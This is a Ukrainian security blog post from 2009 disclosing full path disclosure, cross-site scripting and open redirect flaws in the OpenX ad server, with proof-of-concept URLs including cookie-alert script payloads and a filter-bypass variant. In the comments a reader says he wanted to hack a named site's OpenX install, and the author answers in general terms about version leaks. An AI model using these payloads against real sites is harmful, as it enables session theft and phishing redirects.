Уразливості в OpenX
23:52 02.05.2009У березні, 12.03.2009, я знайшов Full path disclosure, Cross-Site Scripting та Redirector уразливості в OpenX (Redirector уразливість в цій банерній системі я зустрічав на сайтах ще в 2007 році). Це популярна локальна банерна система, що раніше називалася Openads. Уразливості виявив в OpenX v2.4.7 та перевірив їх в інших версіях системи.
Full path disclosure:
http://site/openx/www/delivery/fc.php?MAX_type=1
XSS:
http://site/openx/www/delivery/fc.php?MAX_type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (обхід XSS фільтрів у версії 2.6.3):
http://site/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E
Redirector:
http://site/openx/www/delivery/ck.php?dest=http://site.com
Про редиректор в Openads / OpenX я вже писав.
Уразливі OpenX v2.4.9, OpenX v2.6.3 та попередні версії (та всі версії Openads). А до Redirector уразливі всі версії системи - OpenX v2.8.0 та попередні версії.
Неділя, 20:47 03.05.2009
Як дізнатися яка версія стоїть ?
На connect.ua хотів взломати OpenX
Неділя, 21:39 03.05.2009
Віктор
Існує декілька методів визначення версії системи (OpenX та її попередніх версій Openads та інших). Це можливо через Information Leakage уразливості (витік версії), що мають місце в системі.
Про них я в новинах не писав, бо уразливості низького ризику, але в мене є плани зробити серію статей про Information Leakage в різних движках, що призводять до витоку версій. Може й про OpenX там згадаю. Зокрема про версію OpenX можна дізнатися з адмінки.
Подивився я на connect.ua - схоже, що вони прикрили свою локальну банерну мережу. Бо при доступі до їх сайту з OpenX (до будь-якої сторінки чи скрипта) видає jpg зображення.